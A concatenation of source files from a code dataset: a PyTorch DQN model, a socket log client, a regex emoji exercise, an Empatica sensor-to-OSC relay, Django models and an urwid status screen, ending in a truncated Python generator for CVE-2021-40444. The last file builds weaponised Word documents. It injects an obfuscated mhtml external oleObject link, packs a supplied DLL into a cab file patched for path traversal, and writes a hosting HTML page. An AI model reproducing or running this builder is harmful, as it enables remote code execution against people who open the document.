}\n","sub_path":"python/source/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"596708739","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport torch\nimport torch.nn as nn\n\n\nclass DQN(nn.Module):\n def __init__(self, channels_in, num_actions):\n super(DQN, self).__init__()\n\n self.conv1 = nn.Conv2d(in_channels=channels_in,\n out_channels=32,\n kernel_size=8,\n stride=4)\n self.relu1 = nn.ReLU(True)\n self.conv2 = nn.Conv2d(in_channels=32,\n out_channels=64,\n kernel_size=4,\n stride=2)\n self.relu2 = nn.ReLU(True)\n self.conv3 = nn.Conv2d(in_channels=64,\n out_channels=64,\n kernel_size=3,\n stride=1)\n self.relu3 = nn.ReLU(True)\n self.flat = Flatten()\n self.fc4 = nn.Linear(in_features=64*7*7,\n out_features=512)\n self.relu4 = nn.ReLU(True)\n self.fc5 = nn.Linear(in_features=512,\n out_features=num_actions)\n\n\n def forward(self, x):\n \"\"\"\n Forward pass of the dqn. Should not be called\n manually but by calling a model instance directly.\n\n Inputs:\n - x: PyTorch input Variable\n \"\"\"\n\n x = self.conv1(x)\n x = self.relu1(x)\n x = self.conv2(x)\n x = self.relu2(x)\n x = self.conv3(x)\n x = self.relu3(x)\n x = self.flat(x) # change the view from 2d to 1d\n x = self.fc4(x)\n x = self.relu4(x)\n x = self.fc5(x)\n\n return x\n\n\n @property\n def is_cuda(self):\n \"\"\"\n Check if model parameters are allocated on the GPU.\n \"\"\"\n return next(self.parameters()).is_cuda\n\n\n def save(self, path):\n \"\"\"\n Save model with its parameters to the given path. Conventionally the\n path should end with \"*.model\".\n\n Inputs:\n - path: path string\n \"\"\"\n print('Saving model... %s' % path)\n torch.save(self.state_dict(), path)\n\n\n def load(self, path):\n \"\"\"\n Load model with its parameters from the given path. Conventionally the\n path should end with \"*.model\".\n\n Inputs:\n - path: path string\n \"\"\"\n print('Loading model... %s' % path)\n self.load_state_dict(torch.load(path, map_location=lambda storage, loc: storage))\n\n\nclass Flatten(nn.Module):\n def forward(self, input):\n return input.view(input.size(0), -1)\n","sub_path":"dqn.py","file_name":"dqn.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"486616118","text":"import socket\n\nclient_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient_sock.connect(('127.0.0.1', 53210))\nprint(\"Если нужно прочитать файл с логами введите 1\")\nprint(\"Если нужно найти конкретные строки нажмите 2 и введите строку поиска\")\n\"\"\"\ndata = input(\"Введите значение: \")\nclient_sock.sendall(data.encode())\nprint(\" :Log message itself>\")\nif data == '2':\n data =input(\"Введите поисковое слово: \")\n client_sock.sendall(data.encode())\nclient_sock.sendall(data.encode())\n\"\"\"\n# client_sock.sendall(b'Hello, world')\nlines_index = []\n\nclient_sock.settimeout(1.0)\ndata1 = client_sock.settimeout(300)\n# data = client_sock.recv(1024)\n\ndef sandMessage(): #объявляем функцию для отправки и приема сообщений\n data = input(\"Введите значение: \")\n client_sock.sendall(data.encode()) #отправляем серверу сообщение в виде encode для нормальной декодировки со строны сервера\n #print(\" :Log message itself>\")\n if data == '2': #если введеное значение равно 2 то начинаем новый алгоритм для поискового запроса\n data = input(\"Введите поисковое слово: \")\n client_sock.sendall(data.encode()) #отправляем серверу поисковой запрос\n print(\" :Log message itself>\")\n while data != \"\": #пока полученные сообщения от сервера не пусты клиент прослушивает их\n data = client_sock.recv(1024) #прием сообщений\n print(data.decode(\"utf-8\")) #вывод их в терминал\n return sandMessage() #вызываем заново sandMessage для отправки значения и поскового запроса заново\n\nwhile True:\n sandMessage() #вызываем функцию sandMessage\nclient_sock.close()\n#print(lines_index)\n# print('Received', repr(data))\n","sub_path":"irusyaev/client1.py","file_name":"client1.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"178185217","text":"import re\n\ntext = input()\nword_pattern = r\"(\\*{2}|\\:{2})(?P[A-Z][a-z][a-z]+)\\1\"\nwhole_pattern = r\"(?P(?P(\\*{2}|\\:{2}))[A-Z][a-z][a-z]+(?P=separator))\"\nthreshold = 1\n\nvalid_matches_word = [obj_1.groupdict() for obj_1 in re.finditer(word_pattern, text)]\nvalid_matches_whole = [obj_2.groupdict() for obj_2 in re.finditer(whole_pattern, text)]\n\nwords_only = []\ncool = []\n\nemojis = []\ncool_emojis = []\n\nfor el in valid_matches_word:\n words_only.append(el[\"word\"])\n\nfor element in text:\n if element.isdigit():\n threshold *= int(element)\n\nfor word in words_only:\n current_coolness = 0\n for letter in word:\n current_coolness += int(ord(letter))\n if current_coolness > threshold:\n cool.append(word)\n\nprint(f\"Cool threshold: {threshold}\")\nprint(f\"{len(words_only)} emojis found in the text. The cool ones are:\")\n\nfor element_1 in valid_matches_whole:\n emojis.append(element_1[\"whole\"])\nfor current_word in cool:\n for current_emoji in emojis:\n if current_word in current_emoji:\n cool_emojis.append(current_emoji)\n\nprint(*cool_emojis, sep=\"\\n\")\n","sub_path":"Fundamentals - Final Exams/Emoji Detector.py","file_name":"Emoji Detector.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"58589771","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 10 15:16:30 2017\nSmall program to read data from the Empatica.\n\n@author: Ilkka\n\"\"\"\n\nimport argparse\nimport random\nimport time\nimport sys\nimport socket\nimport signal\nimport datetime\n\nfrom pythonosc import osc_message_builder\nfrom pythonosc import udp_client\nfrom struct import *\nfrom my_utils import logWriter\n\nEMPATICA_ADDRESS = \"127.0.0.1\"\nEMPATICA_PORT = 9999\n\nADDRESS1 = \"192.168.0.130\"\n#ADDRESS1 = \"127.0.0.1\"\n\nPORT1 = 8001\n\n#OSCADDRESS = \"/empatica\"\n\n\n\nif __name__ == \"__main__\":\n# Attempt to ctrl-c work in windows.. not very succesful.\n \n # Start logging\n current_time = str(datetime.datetime.now().timestamp())\n current_time = current_time.replace(\".\", \"_\")\n logfilename = current_time + \".log\"\n \n the_logger = logWriter(logfilename)\n the_logger.log_msg(\"Testing the logger\")\n def signal_handler(signal, frame):\n print( \"caught a signal\")\n global interrupter\n interrupter = True\n \n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n\n# Connect toe the Empatica BLE Server\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n \n sock.connect((EMPATICA_ADDRESS, EMPATICA_PORT))\n \n # On windows machine if you dont put that \\r\\n it does not recognize it..\n \n \n # sock.sendall(\"device_list\\r\\n\".encode())\n \n# Specify the correct device ID:\n \n sock.sendall(\"device_connect A219F2\\r\\n\".encode())\n # sock.sendall(\"device_connect 033B64\\r\\n\".encode())\n time.sleep(1)\n \n # Then subscribe to the physiological signals you wish to record:\n \n sock.sendall(\"device_subscribe gsr ON\\r\\n\".encode())\n \n #time.sleep(1)\n #sock.sendall(\"device_subscribe bat ON\\r\\n\".encode())\n \n #time.sleep(1)\n #sock.sendall(\"device_subscribe bvp ON\\r\\n\".encode())\n time.sleep(1)\n# sock.sendall(\"device_subscribe acc ON\\r\\n\".encode())\n #time.sleep(1)\n #sock.sendall(\"device_subscribe tmp ON\\r\\n\".encode())\n \n\n # Connect to Unity/Max whatever for real-time processing of the data:\n client1 = udp_client.SimpleUDPClient(ADDRESS1, PORT1)\n\n \n \n #logWrite = UnicodeWriter(logfilename, dialect=csv.excel, encoding=\"utf-8\")\n #logWrite.writerow(\"Testing the logger\")\n #logfile_handle = open('eggs.csv', 'rb') as c\n\n\n# open('eggs.csv', 'rb') as csvfile\n\n\n\n \n # we are going to make a veyr quick hack for normalizing the EDA\n EDA_max = 1\n EDA_counter = 0\n EDA_BASELINE_LENGTH = 20\n \n# Read data from Empatica:\n interrupter = False\n while interrupter == False:\n \n data = sock.recv(1024).decode()\n\n data = data.replace(\",\", \".\")\n sample_lines = data.split(\"\\n\")\n print(\"the full data: <{0}>\".format(data))\n\n # print(\"Samples are {0},{1}\".format(samples[1], samples[2]))\n\n# If the Empatica server sends more than one line (or more than one sample), parse each sample separately:\n if len(sample_lines) > 1:\n \n # ignore the last \"line\" as it is actually just the carriage return\n # splitlines above separate \\n\\r into two lines...\n for i in range(0, len(sample_lines) - 1):\n # print(\"line numer {0} is: {1}\".format(i, sample_lines[i]))\n samples = sample_lines[i].split(\" \")\n \n # Maybe do some more elegant solution later but if elses it is for now\n if samples[0] == \"E4_Gsr\":\n msg = osc_message_builder.OscMessageBuilder(address = \"/empatica/EDA\")\n EDA_current = float(samples[2])\n print(\"Current EDA: {0}\".format(EDA_current))\n # quick baseline on the first n samples...\n if EDA_counter < EDA_BASELINE_LENGTH:\n EDA_max += EDA_current\n EDA_counter += 1\n continue\n elif EDA_counter == EDA_BASELINE_LENGTH:\n EDA_max = 2 * (EDA_max / EDA_BASELINE_LENGTH)\n EDA_counter += 1\n continue;\n else:\n if EDA_current > EDA_max:\n EDA_max = EDA_current\n \n EDA_normalized = EDA_current / EDA_max\n the_logger.log_msg(\"EDA: \" + str(EDA_current) + \", \" + str(EDA_normalized) + \"\\n\")\n \n print(\"EDA max is {0} and current EDA is {1} and normalized{2}\".format(EDA_max, samples[2], EDA_normalized))\n msg.add_arg(EDA_normalized)\n msg = msg.build()\n client1.send(msg)\n \n if samples[0] == \"E4_Bvp\":\n msg = osc_message_builder.OscMessageBuilder(address = \"/empatica/BVP\")\n # print(\"sample is as float {0}\".format(float(samples[1])))\n \n \n daitti = datetime.datetime.fromtimestamp(float(samples[1]))\n # print(\"timestamp is {0}\".format(daitti))\n teh_time = daitti.time();\n \n msg.add_arg(teh_time.__str__());\n msg.add_arg(samples[2])\n msg = msg.build()\n \n the_logger.log_msg(\"BVP: \" + str(samples[2]));\n# client1.send(msg)\n if samples[0] == \"E4_Temp\": \n the_logger.log_msg(\"Temp: \" + str(samples[2]));\n# client1.send(msg) \n if samples[0] == \"E4_Bat\":\n print(\"Battery level: {0} \".format(samples[2]))\n \n if samples[0] == \"E4_Ibi\":\n msg = osc_message_builder.OscMessageBuilder(address = \"/empatica/IBI\")\n daitti = datetime.datetime.fromtimestamp(float(samples[1]))\n\n teh_time = daitti.time();\n # teh_time.\n # msg.add_arg((daitti.second + (daitti.microsecond/1000000)))\n msg.add_arg(teh_time.__str__());\n msg.add_arg(samples[2])\n msg = msg.build()\n the_logger.log_msg(\"IBI: \" + str(samples[2]));\n #client1.send(msg)\n \n if samples[0] == \"E4_Acc\":\n print(\"The raw data is {0}\".format(samples[1]) )\n msg = osc_message_builder.OscMessageBuilder(address = \"/empatica/acc\")\n print(\"sample is as float {0}\".format(float(samples[1])))\n \n daitti = datetime.datetime.fromtimestamp(float(samples[1]))\n print(\"timestamp is {0}\".format(daitti))\n teh_time = daitti.time();\n print(\"The acc values are {0}-{1}-{2}\".format(samples[2], samples[3], samples[4]))\n # teh_time.\n # msg.add_arg((daitti.second + (daitti.microsecond/1000000)))\n# msg.add_arg(teh_time.__str__());\n msg.add_arg(abs(int(samples[2])/200))\n msg.add_arg(abs(int(samples[3])/200))\n msg.add_arg(abs(int(samples[4])/200))\n msg = msg.build()\n the_logger.log_msg(\"ACC: \" + str(samples[2]) + \", \"+ str(samples[3]) + \", \" + str(samples[4]));\n \n client1.send(msg)\n # client1.send_message(\"/empatica/acc\", \"1, 2, 3\")\n the_logger.close_it_all()\n \n\n\n","sub_path":"empatica_EDA_normalizer.py","file_name":"empatica_EDA_normalizer.py","file_ext":"py","file_size_in_byte":7317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"14289045","text":"from django.db import models\n\n\nSTEEL_TYPE_CHOICE = (\n ('1080', '1080'),\n ('9310', '9310'),\n ('8645', '8645'),\n ('8620', '8620'),\n ('8617', '8617'),\n ('6150', '6150'),\n ('5160', '5160'),\n ('4620', '4620'),\n ('4140', '4140'),\n ('4130', '4130'),\n ('4118', '4118'),\n ('4047', '4047'),\n)\n\n\nHEAT_TREATMENT_CHOICE = (\n ('austenitizing', 'austenitizing'),\n ('carburizing', 'carburizing'),\n ('normalizing', 'normalizing'),\n ('annealing', 'annealing'),\n ('quencheing', 'quencheing'),\n ('carbonitrieding', 'carbonitrieding'),\n)\n\n\nHEAT_TEMP_CHOICE = (\n ('1050', '1050'),\n ('925', '925'),\n ('885', '885'),\n ('815', '815'),\n ('845', '845'),\n ('900', '900'),\n ('925', '925'),\n ('870', '870'),\n ('880', '880'),\n ('940', '940'),\n ('830', '830'),\n)\n\nHOLDING_TIME_CHOICE = (\n ('30 min', '30 min'),\n ('4 hour', '4 hour'),\n ('2 hour', '2 hour'),\n ('1 hour', '1 hour'),\n ('0 hour', '0 hour'),\n ('11 hour', '11 hour'),\n ('3 hour', '3 hour'),\n ('20 min', '20 min'),\n ('5 min', '5 min'),\n ('8 hour', '8 hour'),\n)\n\nCOOLING_MEDIA_CHOICE = (\n ('furnace', 'furnace'),\n ('oil', 'oil'),\n ('air', 'air'),\n ('water', 'water'),\n)\n\n\n\n\n\nclass Steel(models.Model):\n steel_type = models.CharField(choices=STEEL_TYPE_CHOICE, max_length=50)\n heat_treatment = models.CharField(choices=HEAT_TREATMENT_CHOICE, max_length=50)\n heat_temp = models.CharField(choices=HEAT_TEMP_CHOICE, max_length=50)\n holding_time = models.CharField(choices=HOLDING_TIME_CHOICE, max_length=50)\n cooling_media = models.CharField(choices=COOLING_MEDIA_CHOICE, max_length=50)\n image = models.ImageField(upload_to=\"images\")\n notes = models.CharField(max_length=150)","sub_path":"steel_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"452615643","text":"from ui.feature import Feature\nfrom ui.widget_generator import WidgetGenerator\nfrom system_info.network_info import NetworkInfo\nfrom system_info.system_info import SystemInfo\nfrom system_info.hostname_info import HostnameInfo\nfrom ceph.ceph_info import CephInfo\nimport urwid\n\n\nclass SystemStatus(Feature):\n def __init__(self, menu, content, footer):\n super(SystemStatus, self).__init__(menu, content, footer)\n self.menu.add_menu_button('SAFE Status', self.set_content_widget)\n self.wg = WidgetGenerator(self.content.fieldmgr)\n self.system_info = SystemInformation(self.content.fieldmgr)\n self.ceph_status = CephClusterStatus(self.content.fieldmgr)\n self.networking_status = NetworkingStatus(self.content.fieldmgr)\n\n def set_content_widget(self, b):\n self.__display_status()\n\n def __add_widget_to_content(self, widget_list):\n for widget in widget_list:\n self.content.add_widget(widget)\n\n def __display_status(self):\n self.content.clean_content_widget()\n self.__add_widget_to_content(self.system_info.gen_widgets())\n self.content.add_widget(self.wg.gen_blank_line(2))\n self.__add_widget_to_content(self.ceph_status.gen_widgets())\n self.content.add_widget(self.wg.gen_blank_line(2))\n self.__add_widget_to_content(self.networking_status.gen_widgets())\n\n\nclass SystemInformation(object):\n def __init__(self, fieldmgr):\n self.wg = WidgetGenerator(fieldmgr)\n self.info = SystemInfo()\n\n def gen_widgets(self):\n widgets = []\n widgets.append(self.wg.gen_text('System'))\n widgets.append(self.wg.gen_text_uneditable_field('OS version', self.info.get_os_version()))\n widgets.append(self.wg.gen_text_uneditable_field('OS codename', self.info.get_os_codename()))\n widgets.append(self.wg.gen_text_uneditable_field('Kernel version', self.info.get_kernel_version()))\n return widgets\n\n\nclass CephClusterStatus(object):\n def __init__(self, fieldmgr):\n self.wg = WidgetGenerator(fieldmgr)\n self.info = CephInfo()\n self.hostname_info = HostnameInfo()\n\n def gen_widgets(self):\n status = self.info.is_in_cluster(self.hostname_info.get_hostname())\n widgets = []\n hostname = self.hostname_info.get_hostname()\n widgets.append(self.wg.gen_text('Ceph Cluster'))\n if status:\n widgets.append(self.gen_ceph_status_widget())\n else:\n widgets.append(self.wg.gen_text_uneditable_field('Status', 'N/A'))\n if status and hostname in self.info.get_osd_host_list():\n widgets.append(self.wg.gen_blank_line())\n widgets.append(self.gen_osd_list_widget())\n return widgets\n\n def gen_ceph_status_widget(self):\n widgets = []\n widgets.append(self.wg.gen_text_uneditable_field('Status', 'on'))\n widgets.append(self.wg.gen_text_uneditable_field('Ceph version', self.info.get_version()))\n widgets.append(self.wg.gen_text_uneditable_field('Cluster fsid', self.info.get_fsid()))\n widgets.append(self.wg.gen_text_uneditable_field('Cluster health', self.info.get_health()))\n return urwid.Pile(widgets)\n\n def gen_osd_list_widget(self):\n widgets = []\n widgets.append(self.wg.gen_text('OSD List'))\n for osd in self.info.get_local_osd_list():\n status = 'on' if self.info.is_running_osd(osd) else 'off'\n journal_uuid = self.info.get_uuid_of_journal(osd)\n journal_device = self.info.get_device(journal_uuid)\n osd_uuid = self.info.get_uuid_of_osd(osd)\n osd_device = self.info.get_device(osd_uuid)\n osd_info = osd + ' ( %s / Journal %s )' % (osd_device, journal_device)\n widgets.append(self.wg.gen_text_uneditable_field(osd_info, status))\n return urwid.Pile(widgets)\n\n\nclass NetworkingStatus(object):\n def __init__(self, fieldmgr):\n self.info = NetworkInfo()\n self.wg = WidgetGenerator(fieldmgr)\n\n def get_interfaces_info(self):\n return self.info.get_interfaces_info(\n self.info.get_ethernet_device_names()\n )\n\n def gen_widgets(self):\n widgets = []\n self.interfaces = self.get_interfaces_info()\n widgets.append(self.wg.gen_text('Networking Status'))\n widgets.append(self.gen_interface_info_widget())\n for interface in self.interfaces:\n widgets.append(self.gen_interface_info_widget(interface))\n return widgets\n\n def gen_interface_info_widget(self, interfaceinfo=None):\n '''Generate the format widget for interface Information\n\n Args:\n interfaceinfo type's interface information\n Returns:\n The column widget of the infos\n '''\n if interfaceinfo is None:\n widgets = [\n ('fixed', 2, urwid.Text(('label', ' '))),\n ('weight', 2, urwid.Text('Device')),\n ('weight', 3, urwid.Text('Mac Address')),\n ('weight', 3, urwid.Text('IP Address')),\n ('weight', 2, urwid.Text('Status')),\n ('weight', 3, urwid.Text('Connecting Check'))\n ]\n else:\n status, test_button = self.gen_network_check_button(interfaceinfo)\n widgets = [\n ('fixed', 2, urwid.Text(('label', '* '))),\n ('weight', 2, urwid.Text(interfaceinfo.get_name())),\n ('weight', 3, urwid.Text(interfaceinfo.get_mac_address())),\n ('weight', 3, urwid.Text(interfaceinfo.get_ip_address())),\n ('weight', 2, status),\n ('weight', 3, test_button)\n ]\n widget = urwid.Columns(widgets)\n widget._iterable = True\n return self.wg.set_fixed_columns(widget)\n\n def gen_network_check_button(self, interfaceinfo):\n status = urwid.Text('N/A')\n test_button = urwid.Padding(urwid.Button('Test'), width=8)\n return status, test_button\n","sub_path":"features/SystemStatus.py","file_name":"SystemStatus.py","file_ext":"py","file_size_in_byte":5998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"105166624","text":"#!/usr/bin/python3\n\n# CVE-2021-40444\n\n# Library\nimport argparse,zipfile,shutil,os,string,random,glob\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\n\n# Colors Settings\nclass colors:\n PURPLE = '\\033[95m'\n BLUE = '\\033[94m'\n CYAN = '\\033[92m'\n GREEN = '\\033[92m'\n RED = '\\033[91m'\n RESET = '\\033[0m'\n WHITEBOLD = '\\033[1m'\n ORANGE = '\\033[1;33;40m'\ncg = colors.GREEN\ncr = colors.RESET\n# Header\ndef header():\n\tprint('''\n _______ ________ ___ ___ ___ __ _ _ ___ _ _ _ _ _ _\n / ____\\ \\ / / ____| |__ \\ / _ \\__ \\/_ | | || | / _ \\| || | | || | | || |\n | | \\ \\ / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| || |_| || |_\n | | \\ \\/ / | __|______/ /| | | |/ / | |______|__ _| | | |__ _|__ _|__ _|\n | |____ \\ / | |____ / /_| |_| / /_ | | | | | |_| | | | | | | |\n \\_____| \\/ |______| |____|\\___/____||_| |_| \\___/ |_| |_| |_|\n\n By H0j3n''')\n\n\tprint(cg+\"\\n[+] \"+cr+\"Example : \\n-> python3 gen.py -d document/Sample.docx -p payload/payload.dll -i \\\"http://10.10.10.10\\\" -t html/poc.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3\")\n\n# Function Uncompress Document\ndef uncompress_document(files,folder_name,file_name):\n\tcheck_header = False\n\tcheck_document = False\n\tcheck_footer = False\n\tbasepath = 'output/'+folder_name\n\t# Unzip\n\twith zipfile.ZipFile(files, 'r') as zip_ref:\n\t zip_ref.extractall(basepath+\"/decompress\")\n\tdecompress_path = basepath+\"/decompress\"\n\t# Check .rels file \n\tlist_xml = [ decompress_path+\"/word/\"+i.split(\"/\")[-1][:-5] for i in glob.glob(decompress_path+'/word/_rels/*.rels')]\n\tlist_rels = glob.glob(decompress_path+'/word/_rels/*.rels')\n\t# Beautify (.xml.res) files\n\tfor i in list_rels:\n\t\ttemp = open(i).read()\n\t\ttemp = BeautifulSoup(temp, \"xml\").prettify()\n\t\twith open(i, 'w') as out:\n\t\t\tout.write(temp)\n\t\tout.close()\n\t# Beautify (.xml) files\n\tfor i in list_xml:\n\t\ttemp = open(i).read()\n\t\ttemp = BeautifulSoup(temp, \"xml\").prettify()\n\t\twith open(i,'w') as out:\n\t\t\tout.write(temp)\n\t\tout.close()\n\treturn list_xml,list_rels\n\n# Function Check Oleobject\ndef check_oleobject(list_rels,list_xml):\n\tlist_oleobject = []\n\tfor i in list_rels:\n\t\twith open(i) as reads:\n\t\t\tfor k in reads:\n\t\t\t\tif \"oleobject\" in k.strip().lower():\n\t\t\t\t\tlist_oleobject.append(i)\n\t\t\t\t\treads.close()\n\t\t\t\t\tbreak\n\t\treads.close()\n\ttemp = []\n\tfor k in list_xml:\n\t\tfor j in list_oleobject:\n\t\t\tif k.split(\"/\")[-1] in j:\n\t\t\t\ttemp.append(k)\n\treturn list_oleobject,temp\n\n# Function Modified Document\ndef modified_document(oleobject,mode_obfuscate,host,xml):\n\tout = \"\"\n\twith open(oleobject) as reads:\n\t\tfor i in reads:\n\t\t\tif \"oleobject\" in i.strip().lower():\n\t\t\t\tdata = obfuscator('mhtml:'+host+'!x-usc:'+host,mode_obfuscate)\n\t\t\t\trid = i.strip().split(\"\\\"\")[1]\n\t\t\t\ttemp = ''''''\n\t\t\t\tout += temp\n\t\t\telse:\n\t\t\t\tout+= i.strip()\n\treads.close()\n\tout = out.replace(\"{PAYLOAD_HERE}\",data)\n\tout = BeautifulSoup(out, \"xml\").prettify()\n\twith open(oleobject, 'w') as f:\n\t\tf.write(out)\n\t# Convert to UTF-16BE (.xml.res)\n\tif (mode_obfuscate == \"2\") or (mode_obfuscate == \"3\"):\n\t\tpath_backup = '/'.join(oleobject.split(\"/\")[:-1])+\"/\"\n\t\tos.system(\"cat \"+oleobject+\" | sed 's/utf-8/UTF-16BE/g' | sed 's/UTF8-8/UTF-16BE/g' | iconv -f UTF-8 -t UTF-16BE > \"+path_backup+\"backup\")\n\t\tos.system(\"mv \"+path_backup+\"backup \"+oleobject)\n\t# Edit (.xml)\n\tout = \"\"\n\twith open(xml) as reads:\n\t\tfor i in reads:\n\t\t\tif \"oleobject\" in i.strip().lower():\n\t\t\t\ttemp = i.strip().replace(\"Embed\",\"Link\")[:-2] + ' UpdateMode=\"OnCall\" />'\n\t\t\t\tout += temp\n\t\t\telse:\n\t\t\t\tout += i.strip()\n\treads.close()\n\ttemp = BeautifulSoup(out, \"xml\").prettify()\n\twith open(xml, 'w') as out:\n\t\tout.write(temp)\n\n# Function Obfuscator\ndef obfuscator(payload,checker):\n\t# Convert to HTML Entity\n\tif (checker == \"1\") or (checker == \"3\"):\n\t\ttemp = encode_htmlentity(payload)\n\t\tpayload = temp\n\treturn payload\n\n# Function Encode HTML Entity\ndef encode_htmlentity(payload):\n\tchecklist = [\".\",\":\",\"!\",\"/\"]\n\ttemp = \"\"\n\tfor i in payload:\n\t\tif i not in checklist:\n\t\t\ttemp += (\"&#\"+str(ord(i))+\";\")\n\t\telse:\n\t\t\ttemp += i\n\treturn temp\n\n# Function compressed document\ndef compressed_document(files,checker,folder_name):\n\t# Chcker if rename is pass \n\tif checker == \"None\":\n\t\tdocname = files.split(\"/\")[1]\n\telse:\n\t\tdocname = checker\n\n\t# Zip the folder and files\n\tshutil.make_archive('output/'+folder_name+\"/web/\"+docname, 'zip', 'output/'+folder_name+'/decompress')\n\tos.rename('output/'+folder_name+\"/web/\"+docname+'.zip','output/'+folder_name+\"/web/\"+docname)\n\treturn docname\n# Function Path cab\ndef patch_cab(cab_dir,inf):\n\tm_off = 0x2d\n\tf = open(cab_dir,'rb')\n\tcab_data = f.read()\n\tf.close()\n\n\tout_cab_data = cab_data[:m_off]\n\tout_cab_data += b'\\x00\\x5c\\x41\\x00'\n\tout_cab_data += cab_data[m_off+4:]\n\n\tout_cab_data = out_cab_data.replace(b'..\\\\'+inf.encode(), b'../'+inf.encode())\n\n\tf = open(cab_dir,'wb')\n\tf.write(out_cab_data)\n\tf.close()\n\n# Function write html\ndef write_html(host,files,inf,html,html_dir):\n\ttemp = open(html).read().replace(\"{HOST_CHANGE}\",host+'/'+files).replace(\"{INF_CHANGE}\",inf)\n\twith open(html_dir, 'w') as out:\n\t\tout.write(temp)\n\n# Main\nif __name__ == '__main__':\n\t# Header\n\theader()\n\t# Argument Options\n\tparser = argparse.ArgumentParser(description='A tool to generate document for CVE-2021-40444')\n\tparser.add_argument('-d','--document', help='Get the docoument',required=True)\n\tparser.add_argument('-i','--ip', help='Get Host',required=True)\n\tparser.add_argument('-p','--payload', help='Get the malicious dll',required=True)\n\tparser.add_argument('-t','--html', help='Get the html to be use',required=True)\n\tparser.add_argument('-r','--rename',help='Rename the document file (output)',default=\"None\")\n\tparser.add_argument('-c','--cab',help='Rename the cab file (Make sure to put .cab)',default=\"None\")\n\tparser.add_argument('-f','--inf',help='Rename the inf file (Make sure to put .inf)',default=\"msword.inf\")\n\tparser.add_argument('-obf','--obfuscate',help='Comes with 3 Mode : 1 (HTML Entity), 2 (UTF-16BE), 3 (Both 1 & 2)')\n\tparser.add_argument('-v','--verbose',help='Increase output verbosity',action=\"store_true\")\n\targs = parser.parse_args()\n\n\t# Get time,file name,file extension, folder name\n\tnow = datetime.now()\n\tfile_name = ''.join(''.join(args.document.split(\".\")[:-1]).split(\"/\")[1:])\n\tfile_ext = args.document.split(\".\")[-1]\n\tfolder_name = file_name+\"_\"+file_ext+\"_\"+now.strftime(\"%Y\")+now.strftime(\"%m\")+now.strftime(\"%d\")+\"_\"+now.strftime(\"%H%M%S\")\n\tif args.verbose:\n\t\tprint(cg+\"\\n[+] \"+cr+\"Folder\")\n\t\tprint(\"-> output/\"+folder_name)\n\t# Create New Output Folder & Web\n\tos.system(\"mkdir output/\"+folder_name)\n\tos.system(\"mkdir output/\"+folder_name+\"/web/\")\n\n\t# (1) Uncompress Document\n\tlist_xml,list_rels = uncompress_document(args.document,folder_name,file_name)\n\tif args.verbose:\n\t\tprint(cg+\"\\n[+] \"+cr+\"Uncompress Document\")\n\t\tprint(\"-> List of .rels\")\n\t\tfor i in list_rels:\n\t\t\tprint(\" * \"+i)\n\t\tprint(\"-> List of .xml\")\n\t\tfor i in list_xml:\n\t\t\tprint(\" * \"+i)\n\n\t# (2) Check files with oleobject\n\tlist_oleobject,list_xml = check_oleobject(list_rels,list_xml)\n\tif len(list_oleobject) == 0:\n\t\tprint(\"\\n[-] No OleObject found ! Please check your document again.\")\n\t\texit(-1)\n\telif len(list_oleobject) > 1:\n\t\tprint(\"\\n[-] Found 2 OleObject ! Please ensure that you put either header, document or footer.\")\n\t\texit(-1)\n\tif args.verbose:\n\t\tprint(cg+\"\\n[+] \"+cr+\"Found OleObject\")\n\t\tprint(\"-> List of .rels\")\n\t\tprint(\" * \"+list_oleobject[0])\n\t\tprint(\"-> List of .xml\")\n\t\tprint(\" * \"+list_xml[0])\n\n\t# (3) Modified Document\n\tmodified_document(list_oleobject[0],args.obfuscate,args.ip,list_xml[0])\n\tif args.verbose:\n\t\tprint(cg+\"\\n[+] \"+cr+\"Document done modified\")\n\t# (4) Compressed Document\n\targs.rename = compressed_document(args.document,args.rename,folder_name)\n\tif args.verbose:\n\t\tprint(cg+\"\\n[+] \"+cr+\"Document done compressed\")\n\t\tprint(\"-> \"+'output/'+folder_name+\"/web/\"+args.rename)\n # (5) Convert .dll to .cab\n\tif args.cab == \"None\":\n\t cabname = \"payload.cab\"\n\telse:\n\t cabname = args.cab\n\t# 1. Copy .dll -> .inf \n\t# 2. Make directory gen\n\t# 3. Lcab convert .inf -> .cab\n\t# 4. Create web directory\n\t# 5. Move .cab to web directory\n\tos.system(\"cp \"+args.payload+\" payload/\"+args.inf+\" ; mkdir payload/gen/ ; cd payload/gen/ ; lcab '../\"+args.inf+\"' ../\"+cabname+\" >/dev/null;\")\n\tos.system(\"rm -rf payload/gen;\")\n\tos.system(\"rm payload/\"+args.inf)\n\tos.system(\"mv payload/\"+cabname+\" output/\"+folder_name+\"/web/\")\n\tif args.verbose:\n\t\tprint(cg+\"\\n[+] \"+cr+\".dll convert to .cab\")\n\t\tprint(\"->\"+\" output/\"+folder_name+\"/web/\"+cabname)\n\n\t# (6) Patch .cab\n\tcab_dir = \"output/\"+folder_name+\"/web/\"+cabname\n\tpatch_cab(cab_dir,args.inf)\n\tif args.verbose:\n\t\tprint(cg+\"\\n[+] \"+cr+\".cab patched\")\n\t# (7) Write index.html\n\thtml_dir = \"output/\"+folder_name+\"/web/index.html\"\n\twrite_html(args.ip,cabname,args.inf,args.html,html_dir)\n\tif 